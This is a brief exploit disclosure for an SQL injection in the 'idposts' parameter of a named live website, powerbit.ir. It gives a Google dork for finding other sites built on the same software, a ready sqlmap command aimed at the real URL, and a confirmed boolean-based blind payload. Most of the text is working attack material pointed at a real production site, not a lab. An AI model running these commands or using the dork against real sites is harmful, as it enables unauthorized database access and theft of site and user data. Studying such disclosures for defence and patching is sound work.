# Exploit Title: Powerbit.ir SQL Injection Vulnerability # Author: K0uR0sH3R # Date: 15/04/2021 # Tested On: Kali Linux # Contact: https://t.me/K0uR0sH3R # Google Dork: intext:"کلیه ی حقوق این وب سایت متعلق به پاوربیت می باشد." ---------------------------------------------------------------------------------------------------- # Vulnerable Path: http://powerbit.ir/postDetails?idposts=test # python3 sqlmap.py -u "http://powerbit.ir/postDetails?idposts=test" -p "idposts" --risk="3" --- Parameter: idposts (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: idposts=-9146 OR 6723=6723 ---